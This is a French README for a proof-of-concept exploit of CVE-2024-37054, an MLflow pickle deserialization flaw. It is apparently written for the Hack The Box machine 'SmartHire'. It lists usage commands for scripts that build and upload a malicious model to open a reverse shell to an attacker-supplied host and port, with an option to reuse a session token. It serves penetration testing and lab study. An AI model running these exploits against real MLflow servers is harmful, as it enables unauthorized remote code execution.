
PoC pour CVE-2024-37054
Preuve de concept pour CVE-2024-37054, une vulnérabilité de désérialisation critique dans MLflow versions 0.9.0 à 2.14.1.
Lorsqu'un modèle pyfunc malveillant est chargé via mlflow.pyfunc.load_model(), la charge utile picklée exécute du code arbitraire.
exploit.py — exploit complet : enregistrer, entraîner, téléverser, déclencher (pour la machine HTB SmartHire)build_model.py — construire le modèle malveillant localement (construction uniquement)python3 build_model.py --lhost YOUR_IP --lport 4444
# Auto register account and exploit
python3 exploit.py --lhost YOUR_IP --lport 4444 --atoz
# Use existing session
python3 exploit.py --lhost YOUR_IP --lport 4444 --session "eyJjb21w..."
À des fins éducatives et pour des tests de pénétration autorisés uniquement.